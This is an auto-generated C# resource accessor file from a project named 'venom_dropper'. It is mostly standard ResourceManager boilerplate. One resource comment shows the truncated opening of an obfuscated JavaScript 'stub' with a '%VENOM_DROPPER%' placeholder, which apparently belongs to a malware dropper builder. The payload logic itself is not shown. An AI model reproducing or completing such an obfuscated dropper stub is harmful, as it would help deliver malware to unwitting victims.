//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace venom_dropper.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("venom_dropper.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to var lkjgfsdgljfdsklgjksfdlgjfldksgjsdfkghjdfkshgjsfdkhgksfdjhjsdhlsdgh = &apos;%VENOM_DROPPER%&apos;;function VENOM_DROPPER_MASON_0x202fd5(_0x363c78,_0x42ce60,_0x22282b,_0x358438,_0xaa9662,_0x1427e5,_0x108645,_0x30803f,_0x27549b,_0x5009ed,_0x5eaffa,_0x1a6268,_0x38520e,_0x5be1a2,_0x2cc64e,_0x5779d6,_0x878c8a,_0x2fc063,_0x260f88,_0x5dd4ff,_0x1246f0,_0x4f3d3a,_0x25d575,_0x1bce12,_0x1139e3,_0x234847,_0x48c0a3,_0xdd7db4,_0x3565ce,_0x726c7e,_0x1a103b,_0x5780cc,_0x31dcdb,_0x578dc5,_0x1b080d,_0x3dcd9a,_0x926c0,_0x39ee5f,_0x4 [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string stub {
            get {
                return ResourceManager.GetString("stub", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        internal static System.Drawing.Bitmap venom {
            get {
                object obj = ResourceManager.GetObject("venom", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
    }
}
